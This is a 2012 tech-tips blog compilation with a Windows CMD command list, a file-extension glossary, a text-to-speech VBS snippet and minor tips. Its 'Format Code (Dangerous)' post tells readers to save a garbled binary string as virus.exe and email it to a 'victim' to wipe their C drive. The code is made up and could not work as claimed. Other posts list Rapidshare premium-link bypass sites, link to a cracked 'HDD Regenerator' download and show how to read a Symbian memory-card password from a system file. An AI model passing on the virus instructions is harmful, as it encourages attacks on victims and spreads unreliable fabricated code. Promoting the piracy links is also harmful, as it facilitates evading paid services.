Friday 31 August 2012

CMD Commands


 a
  ADDUSERS Add or list users to/from a CSV file
   ADmodcmd Active Directory Bulk Modify
   ARP      Address Resolution Protocol
   ASSOC    Change file extension associations•assoc
   ASSOCIAT One step file association
   ATTRIB   Change file attributes
b
   BCDBOOT  Create or repair a system partition
   BOOTCFG  Edit Windows boot settings
   BROWSTAT Get domain, browser and PDC info
c
   CACLS    Change file permissions
   CALL     Call one batch program from another•
   CD       Change Directory - move to a specific Folder•
   CHANGE   Change Terminal Server Session properties
   CHKDSK   Check Disk - check and repair disk problems
   CHKNTFS  Check the NTFS file system
   CHOICE   Accept keyboard input to a batch file
   CIPHER   Encrypt or Decrypt files/folders
   CleanMgr Automated cleanup of Temp files, recycle bin
   CLEARMEM Clear memory leaks
   CLIP     Copy STDIN to the Windows clipboard.
   CLS      Clear the screen•
   CLUSTER  Windows Clustering
   CMD      Start a new CMD shell
   CMDKEY   Manage stored usernames/passwords
   COLOR    Change colors of the CMD window•
   COMP     Compare the contents of two files or sets of files
   COMPACT  Compress files or folders on an NTFS partition
   COMPRESS Compress individual files on an NTFS partition
   CON2PRT  Connect or disconnect a Printer
   CONVERT  Convert a FAT drive to NTFS.
   COPY     Copy one or more files to another location•
   CSCcmd   Client-side caching (Offline Files)
   CSVDE    Import or Export Active Directory data
d
   DATE     Display or set the date•
   DEFRAG   Defragment hard drive
   DEL      Delete one or more files•
   DELPROF  Delete user profiles
   DELTREE  Delete a folder and all subfolders
   DevCon   Device Manager Command Line Utility
   DIR      Display a list of files and folders•
   DIRUSE   Display disk usage
   DISKPART Disk Administration
   DNSSTAT  DNS Statistics
   DOSKEY   Edit command line, recall commands, and create macros
   DSACLs   Active Directory ACLs
   DSAdd    Add items to active directory (user group computer)
   DSGet    View items in active directory (user group computer)
   DSQuery  Search for items in active directory (user group computer)
   DSMod    Modify items in active directory (user group computer)
   DSMove   Move an Active directory Object
   DSRM     Remove items from Active Directory
e
   ECHO     Display message on screen•
   ENDLOCAL End localisation of environment changes in a batch file•
   ERASE    Delete one or more files•
   EVENTCREATE Add a message to the Windows event log
   EXIT     Quit the current script/routine and set an errorlevel•
   EXPAND   Uncompress files
   EXTRACT  Uncompress CAB files
f
   FC       Compare two files
   FIND     Search for a text string in a file
   FINDSTR  Search for strings in files
   FOR /F   Loop command: against a set of files•
   FOR /F   Loop command: against the results of another command•
   FOR      Loop command: all options Files, Directory, List•
   FORFILES Batch process multiple files
   FORMAT   Format a disk
   FREEDISK Check free disk space (in bytes)
   FSUTIL   File and Volume utilities
   FTP      File Transfer Protocol
   FTYPE    Display or modify file types used in file extension associations•
g
   GLOBAL   Display membership of global groups
   GOTO     Direct a batch program to jump to a labelled line•
   GPUPDATE Update Group Policy settings
h
   HELP     Online Help
i
   iCACLS   Change file and folder permissions
   IF       Conditionally perform a command•
   IFMEMBER Is the current user a member of a Workgroup
   IPCONFIG Configure IP
k
   KILL     Remove a program from memory
l
   LABEL    Edit a disk label
   LOCAL    Display membership of local groups
   LOGEVENT Write text to the event viewer
   LOGMAN   Manage Performance Monitor
   LOGOFF   Log a user off
   LOGTIME  Log the date and time in a file
m
   MAPISEND Send email from the command line
   MBSAcli  Baseline Security Analyzer.
   MEM      Display memory usage
   MD       Create new folders•
   MKLINK   Create a symbolic link (linkd)
   MODE     Configure a system device
   MORE     Display output, one screen at a time
   MOUNTVOL Manage a volume mount point
   MOVE     Move files from one folder to another•
   MOVEUSER Move a user from one domain to another
   MSG      Send a message
   MSIEXEC  Microsoft Windows Installer
   MSINFO32 System Information
   MSTSC    Terminal Server Connection (Remote Desktop Protocol)
   MV       Copy in-use files
n
   NET      Manage network resources
   NETDOM   Domain Manager
   NETSH    Configure Network Interfaces, Windows Firewall & Remote access
   NETSVC   Command-line Service Controller
   NBTSTAT  Display networking statistics (NetBIOS over TCP/IP)
   NETSTAT  Display networking statistics (TCP/IP)
   NOW      Display the current Date and Time
   NSLOOKUP Name server lookup
   NTBACKUP Backup folders to tape
   NTRIGHTS Edit user account rights
o
   OPENFILES Query or display open files
p
   PATH     Display or set a search path for executable files•
   PATHPING Trace route plus network latency and packet loss
   PAUSE    Suspend processing of a batch file and display a message•
   PERMS    Show permissions for a user
   PERFMON  Performance Monitor
   PING     Test a network connection
   POPD     Restore the previous value of the current directory saved by PUSHD•
   PORTQRY  Display the status of ports and services
   POWERCFG Configure power settings
   PRINT    Print a text file
   PRINTBRM Print queue Backup/Recovery
   PRNCNFG  Display, configure or rename a printer
   PRNMNGR  Add, delete, list printers set the default printer
   PROMPT   Change the command prompt•
   PsExec     Execute process remotely
   PsFile     Show files opened remotely
   PsGetSid   Display the SID of a computer or a user
   PsInfo     List information about a system
   PsKill     Kill processes by name or process ID
   PsList     List detailed information about processes
   PsLoggedOn Who's logged on (locally or via resource sharing)
   PsLogList  Event log records
   PsPasswd   Change account password
   PsService  View and control services
   PsShutdown Shutdown or reboot a computer
   PsSuspend  Suspend processes
   PUSHD    Save and then change the current directory•
q
   QGREP    Search file(s) for lines that match a given pattern.
r
   RASDIAL  Manage RAS connections
   RASPHONE Manage RAS connections
   RECOVER  Recover a damaged file from a defective disk.
   REG      Registry: Read, Set, Export, Delete keys and values
   REGEDIT  Import or export registry settings
   REGSVR32 Register or unregister a DLL
   REGINI   Change Registry Permissions
   REM      Record comments (remarks) in a batch file•
   REN      Rename a file or files•
   REPLACE  Replace or update one file with another
   RD       Delete folder(s)•
   RMTSHARE Share a folder or a printer
   ROBOCOPY Robust File and Folder Copy
   ROUTE    Manipulate network routing tables
   RUN      Start | RUN commands
   RUNAS    Execute a program under a different user account
   RUNDLL32 Run a DLL command (add/remove print connections)
s
   SC       Service Control
   SCHTASKS Schedule a command to run at a specific time
   SCLIST   Display Services
   SET      Display, set, or remove environment variables•
   SETLOCAL Control the visibility of environment variables•
   SETX     Set environment variables permanently
   SFC      System File Checker
   SHARE    List or edit a file share or print share
   SHIFT    Shift the position of replaceable parameters in a batch file•
   SHORTCUT Create a windows shortcut (.LNK file)
   SHOWGRPS List the Workgroups a user has joined
   SHOWMBRS List the Users who are members of a Workgroup
   SHUTDOWN Shutdown the computer
   SLEEP    Wait for x seconds
   SLMGR    Software Licensing Management (Vista/2008)
   SOON     Schedule a command to run in the near future
   SORT     Sort input
   START    Start a program or command in a separate window•
   SU       Switch User
   SUBINACL Edit file and folder Permissions, Ownership and Domain
   SUBST    Associate a path with a drive letter
   SYSTEMINFO List system configuration
t
   TASKLIST List running applications and services
   TASKKILL Remove a running process from memory
   TIME     Display or set the system time•
   TIMEOUT  Delay processing of a batch file
   TITLE    Set the window title for a CMD.EXE session•
   TLIST    Task list with full path
   TOUCH    Change file timestamps  
   TRACERT  Trace route to a remote host
   TREE     Graphical display of folder structure
   TSSHUTDN Remotely shut down or reboot a terminal server
   TYPE     Display the contents of a text file•
   TypePerf Write performance data to a log file
u
   USRSTAT  List domain usernames and last login
v
   VER      Display version information•
   VERIFY   Verify that files have been saved•
   VOL      Display a disk label•
w
   WAITFOR  Wait for or send a signal
   WHERE    Locate and display files in a directory tree
   WHOAMI   Output the current UserName and domain
   WINDIFF  Compare the contents of two files or sets of files
   WINMSDP  Windows system report
   WINRM    Windows Remote Management
   WINRS    Windows Remote Shell
   WMIC     WMI Commands
   WUAUCLT  Windows Update
x
   XCACLS   Change file and folder permissions
   XCOPY    Copy files and folders
   ::       Comment / Remark•

free premium link generators


list of free premium link generators

Rapidshare.com Link Generators

www.rapidquick.net

Max No of links you can generate daily : 3

www.rapidirty.com

Max No of links you can generate daily : Unknown

www.hostyoursites.biz

Max No of links you can generate daily : 10

www.Premium4Me.Com

Max No of links you can generate daily : Unknown

www.RapidDownloader.Info

Max No of links you can generate daily : Unknown

www.Khongbiet.Com

Max No of links you can generate daily : Unknown

www.Rapid-Hook.Com

Max No of links you can generate daily : 4

www.Rapidshack.Us

Max No of links you can generate daily : Unknown

www.Megaez.Com

Max No of links you can generate daily : Unknown

www.RapidsharePremiumLinkGenerator.Com

Max No of links you can generate daily : Unknown

www.rapidhack.prv.pl

Max No of links you can generate daily : 5

www.RapitShare.Info

Max No of links you can generate daily : 5

www.FreeRsLinks.Com

Max No of links you can generate daily : 100

www.Rapidl.Com

Max No of links you can generate daily : 3

www.RapidFile.Us

Max No of links you can generate daily : 2

www.Rapidshare.Co.In

Max No of links you can generate daily : 5

www.RapidLeech.com

Max No of links you can generate daily : Unknown

www.RsFox.Com

Max No of links you can generate daily : 5

www.Rs43.Com

Max No of links you can generate daily : Unknown

www.FreeRapid.Org

Max No of links you can generate daily : Unknown

www.Rapid4All.Com

Max No of links you can generate daily : 5

www.Adomreg.Com

Max No of links you can generate daily : Unknown


Format Code (Dangerous)


How to Format Someone's Hard Disk

1. Write/copy the following code:
010010110001111100100101010101?010100000111111 00000

2. Save As it as .EXE and any Name would Do. eg- (virus.exe)
see here if you dont know how to save notepad as exe?

3. If u run the program means it will format the Hard Drive.

4. Next Send this to your Victim Some How like Email . If he Click on it then His C drive will Format

C$UTI0N:

NOTE: This is for learning purpose only!! I am is not responsible for any Cause!!

Friday 17 August 2012

Crack Memory Card Password [FAST]




We usually set password for our memory card for privacy and security, but the common mistake every one does at least once in out life time forgetting password. If you set password for mobile memory card, then you should be not forget the password. If you does then the only option is to formate your memory card with the help of the card reader and eventually the loss of all your data stored on it. There is a way to break the security wall. If you are a Symbian device lover then no need to worry about the password. You can crack them in few minutes.


In this tutorial I am going to teach you how to reset your memory card password in easy step. Before we start you need to have X-plore (application used to explore your system files and folder even the hidden folders in your device)



Step1: Install X-Plore in your mobile. If you want to download X-Plore search around internet you can download free trail.

Step2: Open your X-plore apps and Press 0(Zero) and check which you have marked the "show the system files"

Step3: Once you done that now go to the following path C:/Sys/Data/Mmcstore

Step4: Once you reached there you need to press "3" under option to set it in the Hex-viewer

Step5: See the third column you will able to see a line of code ! TMSD02G (c??"?x???6?2?6?2?6). Just check the character between the "?" it is your password ie: 62626



Note: If you have not set the password, then you will not able to gain access to C:/Sys/Data

List of Extensions


A

ABK Corel Draw AutoBackup
ACL Corel Draw 6 keyboard accelerator
ACM Used by Windows in the system directory
ACP Microsoft Office Assistant Preview file
ACT Microsoft Office Assistant Actor file
ACV OS/2 drivers that compress and decompress audio data
AD After Dark screensaver
ADB Appointment database used by HP 100LX organizer
ADD OS/2 adapter drivers used in the boot process
ADM After Dark MultiModule screensaver
ADP Used by FaxWorks to do setup for fax modem interaction
ADR After Dark Randomizer screensaver
AFM Adobe font metrics
AF2 ABC Flowchart file
AF3 ABC Flowchart file
AI Adobe Illustrator drawing
AIF Apple Mac AIFF sound
ALB JASC Image Commander album
ALL Arts & Letters Library
AMS Velvert Studio music module (MOD) file
ANC Canon Computer Pattern Maker file that is a selectable list of pattern colors
ANI Animated Cursor
ANS ANSI text
API Application Program Interface file; used by Adobe Acrobat
APR Lotus Approach 97 file
APS Microsoft Visual C++ file
ARC LH ARC (old version) compressed archive
ARJ Robert Jung ARJ compressed archive
ART Xara Studio drawing
ART Canon Crayola art file
ASA Microsoft Visual InterDev file
ASC ASCII text
ASD WinWord AutoSave
ASM Assembler language source file
ASP Active Server Page (an HTML file containing a Microsoft server-processed script)
ASP Procomm Plus setup and connection script
AST Claris Works "assistant" file
ATT AT&T Group 4 bitmap
AVI Microsoft Video for Windows movie
AWD FaxView document

B

BAK Backup file
BAS BASIC code
BAT Batch file
BFC Windows 95 Briefcase document
BG Backgammon for Windows game
BI Binary file
BIF GroupWise initialization file
BIN Binary file
BK Sometimes used to denote backup versions
BK$ Also sometimes used to denote backup versions
BKS An IBM BookManager Read bookshelf
BMK An A bookmark file
BMP Windows or OS/2 bitmap
BM1 Apogee BioMenace data file
BRX A file for browsing an index of multimedia options
BSP Quake map
BS1 Apogee Blake Stone data file
BTM Batch file used by Norton Utilities
B4 Helix Nuts and Bolts file

C

C C code
CAB Microsoft cabinet file (program files compressed for software distribution)
CAL CALS Compressed Bitmap
CAL Calendar schedule data
CAS Comma-delimited ASCII file
CAT IntelliCharge categorization file used by Quicken
CB Microsoft clean boot file
CCB Visual Basic Animated Button configuration
CCF Multimedia Viewer configuration file used in OS/2
CCH Corel Chart
CCM Lotus CC:Mail "box" (for example, INBOX.CCM)
CDA CD Audio Track
CDF Microsoft Channel Definition Format file
CDI Phillips Compact Disk Interactive format
CDR Core Draw drawing
CDT Corel Draw template
CDX Corel Draw compressed drawing
CEL CIMFast Event Language file
CFB Comptons Multimedia file
CFG Configuration file
CGI Common Gateway Interface script file
CGM Computer Graphics Metafile
CH OS/2 configuration file
CHK File fragments saved by Windows Disk Defragmenter or ScanDisk
CHP Ventura Publisher chapter
CIL Clip Gallery download package
CIM Sim City 200 file
CIN OS/2 change control file that tracks changes to an INI file
CK1 iD/Apogee Commander Keen 1 data file
CK2 iD/Apogee Commander Keen 2 data file
CK3 iD/Apogee Commander Keen 3 data file
CK4 iD/Apogee Commander Keen 4 data file
CK5 iD/Apogee Commander Keen 5 data file
CK6 iD/Apogee Commander Keen 6 data file
CLASS Java class
CLP Windows Clipboard file
CLS Visual Basic Class Module
CMD Command file for Windows NT (similar to a DOS .BAT file)
CMD DOS CP/M command file
CMD dBase-II program file
CMF Corel Metafile
CMP JPEG Bitmap
CMP Address document
CMV Corel Move animation
CMX Corel Presentation Exchange image
CNF Configuration file used by Telnet, Windows, and other applications
CNM Windows application menu options and setup file
CNQ Compuworks Design Shop file
CNT Windows (or other) system content files for the help index and other purposes
COB trueSpace2 object
COD Microsoft C compiler output as displayable assembler with original C as comments
COM Command file (program)
CPD Fax Cover document
CPE Fax Cover document
CPI Microsoft MS-DOS code page information file
CPL Control Panel extension
CPL Corel colour palette
CPP C++ code
CPR Corel Presents Presentation
CPT Corel Photo-Paint image
CPX Corel Presentation Exchange Compressed drawing
CRD Cardfile file
CRP Corel Presents Run-Time Presentation
CRT Certificate file
CSC Corel Script
CSP PC Emcee On-Screen image
CSV Comma-separated values file
CT Scitex CT Bitmap
CTL Used in general to mean a file containing control information.
CUE Microsoft Cue Cards data
CUR Windows Cursor
CUT Dr Halo bitmap
CV Corel Versions archive
CV Microsoft CodeView information screen
CWK Claris Works data file
CWS Claris Works template
CXX C++ source code file

D

DAT Data file
DAT WordPerfect Merge Data
DBF Aston-Tate dBASE database
DBX DataBeam image
DCR Shockwave file
DCS Desktop Color Separation file
DCX Fax image (based on PCX)
DDF BTRIEVE database
DEF SmartWare II data file
DEF C++ Definition
DER Certificate file
DIB Device-Independent Bitmap
DIC Dictionary
DIF Data Interchange Format spreadsheet
DIR Macromedia Director file
DIZ Description file
DLG C++ Dialogue Script
DLL Dynamic-Link Library
DMF X-Trakker music module (MOD) file
DOC FrameMaker or FrameBuilder document
DOC WordStar document
DOC WordPerfect document
DOC Microsoft Word document
DOT Microsoft Word document Template
DPR Borland Delphi project header file
DRV Driver
DRW Micrografx Designer/Draw
DSG DooM saved game
DSM Dynamic Studio music module (MOD) file
DSP Microsoft Developer Studio project
DSQ Corel QUERY file
DSW Microsoft Developer Studio workspace
DWG AutoCAD drawing eXchange format
DXF AutoDesk Drawing Interchange format

E

EMF Enhanced Windows Metafile
ENC Encore file
EPS Encapsulated PostScript image
ER1 ERWin file
ERX ERWin file
EVY Envoy document
EWL Microsoft Encarta document
EXE Executable file (program)

F

F FORTRAN file
F77 FORTRAN file
F90 FORTRAN file
FAR Farandole Composer music module (MOD) file
FAV Microsoft Outlook navigation bar
FAX FAX Type image
FH3 Aldus Freehand 3 drawing
FIF Fractal image file
FITS CCD camera image
FLC AutoDesk FLIC animation
FLI AutoDesk FLIC animation
FLT Corel filter
FLT StarTrekker music module (MOD) file
FMB Oracle binary source code for form, version 4.0 and later
FMT Oracle text format of form, version 4.0 and later
FMT Microsoft Schedule+ print file
FMX Oracle executable form, version 4.0 and later
FOG Fontographer font
FON System font
FOR FORTRAN file
FOT Font-related file
FP FileMaker Pro file
FP1 Flying Pigs for Windows data file
FP3 FileMaker Pro file
FPX FlashPix bitmap
FRM Form
FRM FrameMaker or FrameBuilder document
FRM Oracle executable form version 3.0 and earlier
FRM Visual Basic form
FRM WordPerfect Merge form
FRX Visual Basic form stash file

G


GAL Corel Multimedia Manager album
GCP Ground Control Point file used in image processing of remote sensing data .
GED Graphic Environment Document (drawing)
GEM GEM metafile
GEN Ventura-Generated text file
GFC Patton&Patton Flowcharting 4 flowchart file
GFI Genigraphics Graphics Link presentation
GFX Genigraphics Graphics Link presentation
GID Windows 95 global index file (containing help status)
GIF CompuServe bitmap
GIM Genigraphics Graphics Link presentation
GIX Genigraphics Graphics Link presentation
GNA Genigraphics Graphics Link presentation
GNX Genigraphics Graphics Link presentation
GRA Microsoft Graph
GRD Grid file, used in image processing of remote sensing data often to form map projections.  GRP Program Manager Group
GTK Graoumftracker (old) music module (MOD) file
GT2 Graoumftracker (new) music module (MOD) file
GWX Genigraphics Graphics Link presentation
GWZ Genigraphics Graphics Link presentation
GZ Unix Gzip compressed file

H

H C program header
HED HighEdit document
HEL Microsoft Hellbender saved game
HEX Macintosh BinHex 2.0 file
HGL HP Graphics Language drawing
HLP Help file
HOG Lucas Arts Dark Forces WAD file
HPJ Visual Basic Help Project
HPP C++ program header
HQX Macintosh BinHex 4.0 file
HST History file
HT HyperTerminal
HTM Hypertext document
HTML Hypertext document
HTX Extended HTML template

I

ICA Citrix file
ICB Targa bitmap
ICM Image Color Matching profile file
ICO Windows Icon
IDD MIDI Instrument Definition
IDQ Internet Data Query file
IFF Amiga ILBM
IGF Inset Systems metafile
IIF QuickBooks for Windows interchange file
IMA WinImage file
IMG GEM image
INC Assembler language or Active Server include file
INF Information file
INI Initialization file
INP Oracle source code for form, version 3.0 and earlier
INS InstallShield install script
INS X-Internet sign-up file
ISO Lists the files on a CD-ROM; based on the ISO 9660 CD-ROM file system standard
ISP X-Internet sign-up file
ISU InstallShield uninstall script
IT Impulse Tracker music module (MOD) file
IW Idlewild screensaver

J

JAR Java ARchive file (a compressed file for applets and related files)
JAVA Java source code
JBF Paint Shop Pro image browser file
JFF JPEG bitmap
JIF JPEG bitmap
JMP SAS JMPDiscovery chart-to-statistics file
JN1 Epic MegaGames Jill of the Jungle data file
JPEG JPEG bitmap
JPG JPEG bitmap
JS JavaScript source code
JTF JPEG bitmap

K

KDC Kodak Photo-Enhancer
KFX KoFax Group 4 image
KYE Kye game data

L

LBM Deluxe Paint bitmap
LDB Microsoft Access lock file
LEG Legacy document
LHA Alternate file suffix for LZH
LIB Library
LIS Output file produced by a Structured Query Reporting (SQR) program
LOG 1. Log file
LOG 2. Log file used by pokerstars for errors in their poker software
LPD Helix Nuts and Bolts file
LRC Intel Video Phone file
LST List file
LWO Lightwave Object file
LWP Lotus Wordpro 96/97 file
LZH LH ARC compressed archive
LZS Skyroads data file

M

MAD Microsoft Access module
MAF Microsoft Access Form
MAK Visual Basic or MS Visual C++ Project
MAM Microsoft Access Macro
MAP Map file
MAP Duke Nukem 3D WAD game file
MAQ Microsoft Access Query
MAR Microsoft Access Report
MAS Lotus Freelance Graphics Smartmaster file
MAT Microsoft Access Table
MAX Paperport file
MAZ Hover maze data
MB1 Apogee Monster Bash data file
MCC Dialer10 calling card
MCS MathCAD image
MCW Microsoft Word for Macintosh document
MDA Microsoft Access add-in
MDB Microsoft Access database
MDE Microsoft Access MDE file
MDL Digital Tracker music module (MOD) file
MDL Quake model file
MDN Microsoft Access blank database template
MDW Microsoft Access Workgroup
MDZ Microsoft Access wizard template
MED Music Editor, OctaMED music module (MOD) file
MER Format for interchanging spreadsheet/database data; recognized by Filemaker, Excel, and others
MET Presentation Manager metafile
MI Miscellaneous
MIC Microsoft Image Composer file
MID MIDI music
MMF Microsoft Mail File
MMM Microsoft Multimedia Movie
MOD FastTracker, StarTrekker, Noise Tracker (etc.) music module file
MOD Microsoft Multiplan spreadsheet
MOV QuickTime for Windows movie
MPE MPEG animation
MPEG MPEG animation
MPG MPEG animation
MPP Microsoft Project file
MPP CAD drawing file format
MP3 MPEG Audio Layer 3 (AC3) file
MSG Microsoft Mail message
MSN Microsoft Network document
MSP Microsoft Paint bitmap
MTM MultiTracker music module (MOD) file
MUS Music
MVB Microsoft Multimedia Viewer file
MWP Lotus Wordpro 97 Smartmaster file

N

NAP NAP Metafile
NCB Microsoft Developer Studio file
NSF Lotus Notes database
NST Noise Tracker music module (MOD) file
NTF Lotus Notes database template

O


OBD Microsoft Office binder template
OBD Microsoft Office Binder
OBJ Object file
OBZ Microsoft Office Binder Wizard
OCX Microsoft Object Linking and Embedding custom control
OFN Microsoft Office FileNew file
OFT Microsoft Outlook template
OKT Oktalyzer music module (MOD) file
OLB OLE Object Library
OLE OLE object
OPT Microsoft Developer Studio file
ORG Lotus Organiser file
OR2 Lotus Organiser 2 file
OR3 Lotus Organiser 97 file


P


P10 Tektronix Plot 10 drawing
PAB Microsoft Personal Address Book
PAK Quake WAD file
PAL Windows colour palette
PAT Corel Draw pattern
PBK Microsoft Phonebook
PBM Portable Bitmap
PCD Kodak Photo-CD image
PCL HP Laserjet bitmap
PCS PICS animation
PCT Macintosh PICT drawing
PCX ZSoft PC Paintbrush bitmap
PDF Adobe Acrobat Portable Document Format or Netware Printer Definition File
PDF Package Definition File from Microsoft Systems Management Server
PDQ Patton&Patton Flowcharting PDQ Lite file
PFA Type 1 font (ASCII)
PFB Type 1 font (binary)
PFC PF Component
PFM Printer Font Metrics
PGL HP Plotter drawing
PGM Portable Graymap (bitmap)
PIC PC Paint bitmap
PIC Lotus picture
PIC Macintosh PICT drawing
PIF Program Information File
PIF IBM PIF drawing
PIG Lucas Arts Dark Forces WAD file
PIN Epic Pinball data file
PIN Epic Pinball data file
PIX Inset Systems bitmap
PJ MKS Source Integrity file
PKG Microsoft Developer Studio application extension (similar to a DLL file)
PL Perl program
PLT HPGL Plotter drawing
PLT AutoCAD Plot drawing
PM5 Pagemaker 5.0 file
PM6 Pagemaker 6.0 file
P65 Pagemaker 6.5 file
PNG Portable Network Graphics bitmap
PNG Paint Shop Pro Browser catalogue
PNT MacPaint graphic file
POT Microsoft PowerPoint Template
PP4 Picture Publisher 4 bitmap
PPA Microsoft PowerPoint Add-in
PPM Portable Pixelmap bitmap
PPS Microsoft PowerPoint slide show
PPT Microsoft PowerPoint presentation
PRE Lotus Freelance presentation
PRF Windows system file
PRN Print Table (space delimited text)
PRS Harvard Graphics for Windows presentation
PRZ Lotus Freelance Graphics 97 file
PS Postscript Interpreted drawing
PSD Adobe Photoshop bitmap
PST Microsoft Outlook Personal Folder File
PTM Polytracker music module (MOD) file
PUB Ventura Publisher publication
PUB Microsoft Publisher document
PWD Microsoft Pocket Word document
PWZ Microsoft PowerPoint Wizard
PXL Microsoft Pocket Excel spreadsheet

Q

QAD PF QuickArt Document
QBW QuickBooks for Windows file
QDT Quick Books data file from the Quicken UK Accountancy/Tax/Invoice program
QLB Quick Library
QRY Microsoft Query
QT QuickTime Movie
QTM QuickTime Movie
QXD Quark XPress file

R

R Pegasus Mail resource file
RA Real Audio sound
RAM Real Audio sound
RAS Sun Raster Images bitmap
RAW Raw File Format (bitmap)
RC Microsoft Visual C++ Resource Script
REC Recorder macro
REG Registration file
RES Microsoft Visual C++ Resource
RFT RFT-DCA
RLE Run-Length Encoded bitmap
RM Real Audio video file
RMI MIDI music
ROV Rescue Rover data file
RPT Microsoft Visual Basic Crystal Reports file
RTF Rich Text Format document
RTM Real Tracker music module (MOD) file

S

SAM Ami Professional document
SAV Saved game file
SCC Microsoft Source Safe file
SCD Matrix/Imapro SCODL slide image
SCD Microsoft Schedule+ 7
SCH Microsoft Schedule+ 1
SCN trueSpace2 scene
SCP Dial-Up Networking Script
SCR Windows screensaver
SCR Fax image
SCT Scitex CT bitmap
SC2 Microsoft Schedule+ 7
SDL SmartDraw library
SDR SmartDraw drawing
SDT SmartDraw template
SEA Self-expanding archive (used by Stuffit for Mac files and possibly by others)
SEP Tagged Image File Format (TIFF) bitmap
SHB Corel Show presentation
SHB Document shortcut file
SHG Hotspot bitmap
SHS Shell scrap file
SHW Corel Show presentation
SIT Stuffit archive of Mac files
SLK Symbolic Link (SYLK) spreadsheet
SND NeXT sound
SND Mac Sound Resource
SQC Structured Query Language (SQR) common code file
SQR Structured Query Language (SQR) program file
STM Scream Tracker music module (MOD) file
STY Ventura Publisher style sheet
SVX Amiga 8SVX sound
SYS System file
S3M Scream Tracker 3 music module (MOD) file

T

TAR Tape Archive
 TAZ Unix Gzip/Tape Archive
TEX Texture file
TGA Targa bitmap
TGZ Unix Gzip/Tape Archive
THEME Windows 95 Desktop Theme
THN Graphics Workshop for Windows thumbnail
TIF Tag Image File Format (TIFF) bitmap
TIFF Tag Image File Format (TIFF) bitmap
TIG Tiger file, used by US government to distribute maps
TLB OLE Type Library
TMP Windows temporary file
TRM Terminal file
TRN MKS Source Integrity project usage log
TTF TrueType font
TWF TabWorks file
TWW Tagwrite Template
TX8 MS-DOS Text
TXT Text
T2T Sonata CAD modelling software file

U

UDF Windows NT Uniqueness Database File
ULT Ultratracker music module (MOD) file
URL Internet shortcut
USE MKS Source Integrity file


V

VBP Visual Basic Project
VBW Microsoft Visual Basic workspace
VBX Visual Basic custom control
VCF Vevi Configuration File; defines objects for use with Sense8's WorldToolKit
VDA Targa bitmap
VI Virtual Instrument file from National Instruments LABView product
VLB Corel Ventura Library
VOC Creative Labs Sound Blaster sound
VP Ventura Publisher publication
VSD Visio drawing (flow chart or schematic)
VST Targa bitmap
VSW Visio Workspace file
VXD Microsoft Windows virtual device driver



W

WAD Large file for Doom game containing video, player level, and other information
WAV Windows Waveform sound
WB1 QuattroPro for Windows spreadsheet
WB2 QuattroPro for Windows spreadsheet
WBK Microsoft Word Backup
WBL Argo WebLoad II upload file
WCM WordPerfect Macro
WDB Microsoft Works database
WEB CorelXara Web document
WGP Wild Board Games data file
WID Ventura width table
WIL WinImage file
WIZ Microsoft Word Wizard
WK1 Lotus 123 versions 1 & 2 spreadsheet
WK3 Lotus 123 version 3 spreadsheet
WK4 Lotus 123 version 4 spreadsheet
WKS Lotus 123 Worksheet spreadsheet
WKS Microsoft Works document
WLF Argo WebLoad I upload file
WLL Microsoft Word Add-In
WMF Windows Metafile
WOW Grave Composer music module (MOD) file
WP WordPerfect document
WPW Novel PerfectWorks document
WP4 WordPerfect 4 document
WP5 WordPerfect 5 document
WP6 WordPerfect 6 document
WPD WordPerfect Demo
WPD WordPerfect Document
WPG WordPerfect Graphic
WPS Microsoft Works document
WPT WordPerfect Template
WQ1 QuattroPro/DOS spreadsheet
WQ2 QuattroPro/DOS version 5 spreadsheet
WRI Write document
WRL Virtual Reality model
WS1 WordStar for Windows 1 document
WS2 WordStar for Windows 2 document
WS3 WordStar for Windows 3 document
WS4 WordStar for Windows 4 document
WS5 WordStar for Windows 5 document
WS6 WordStar for Windows 6 document
WS7 WordStar for Windows 7 document
WSD WordStar 2000 document
WVL Wavelet Compressed Bitmap


X


XAR Corel Xara drawing
XLA Microsoft Excel add-in
XLB Microsoft Excel toolbar
XLC Microsoft Excel chart
XLD Microsoft Excel dialogue
XLK Microsoft Excel backup
XLM Microsoft Excel macro
XLS Microsoft Excel worksheet
XLT Microsoft Excel template
XLV Microsoft Excel VBA module
XLW Microsoft Excel workbook / workspace
XM FastTracker 2, Digital Tracker music module (MOD) file
XR1 Epic MegaGames Xargon data file
XTP XTree data file
XY3 XYWrite III document
XY4 XYWrite IV document
XYP XYWrite III Plus document
XYW XYWrite for Windows 4.0 document

Y

YAL Arts & Letters clipart library
YBK Microsoft Encarta Yearbook


Z

Z Unix Gzip
ZIP Zip file
ZOO An early compressed file format


Numbers and Symbols


000-999 Used to number old versions of files and number related data files
12M Lotus 123 97 Smartmaster file
123 Lotus 123 97 file
2GR and 3GR VGA Graphics driver/configuration files under Windows
386 A file for use in an 80386 or higher microprocessor
669 Composer 669, Unis Composer music mod file
#01 and higher A method of numbering picture files for a roll of film that has been scanned  $$$ Used by OS/2 to keep track of archived files @@@ Screen files used in the installation and instruction on use of applications

Source - Tips & Tricks

Convert Text into audio using notepad


Dear readers , here i am posting one code with the help of that code you can convert text in to audio using notepad.
open notepad and paste the bellow code in notepad and save it as anything.vbs.

code:

Dim msg, sapi
msg=InputBox("ENTER THE TEXT–www.facebook.com/nisargtechtips","Text-To-Audio Converter by Nisarg :)")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak msg

BAD SECTOR REMOVER


Now it is very easy to remove bad sectors. Great opportunities for Computer Repairers just download and write ISO to disk and start removing bad sectors. click here to download
http://tinyh4cker.blogspot.com/2011/09/hdd-regenerator-full-iso-free-download.html

Friday 3 August 2012

Facebook Shortcuts

Facebook Shortcuts ->

For Mozila Firefox Users :-

Shift + Alt + # ( in place of # you have to put correspondence Number given below)

Exp :- shift + alt + 1 -- home

Map:
0 - Help
1 - Home
2 - Profile
3 - Friends
4 - Inbox
5 – Notifications
6 – Account Settings
7 - Privacy
8 - About
9 - Terms

Convert Text into audio using notepad

Convert Text into audio using notepad
Dear readers , here i am posting one code with the help of that code you can convert text in to audio using notepad.
open notepad and paste the bellow code in notepad and save it as anything.vbs.

code:

Dim msg, sapi
msg=InputBox("ENTER THE TEXT–Nisarg Gajjar","Text-To-Audio Converter by Tech Tips :)")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak msg

Clear history in single click

Tip to clear all windows history files with a single click

This tip will help you to manage the all types of user history in windows operating system.
This is a built-in feature of all windows keeps track the user's history, for example the
websites you have visited, the documents you have opened and the keywords or files
for which you've searched. However this tip is very useful for you,
if you 
are sharing your computer with others or you do not want that the other persons
know about your last visited documents history. You can clear these kinds
of user's history with a single click on desktop icon named Cleanmru.reg.
There is no need to clear each history file one by one. This trick will work in
nearly all of the windows versions like windows 2000, XP and 2003.

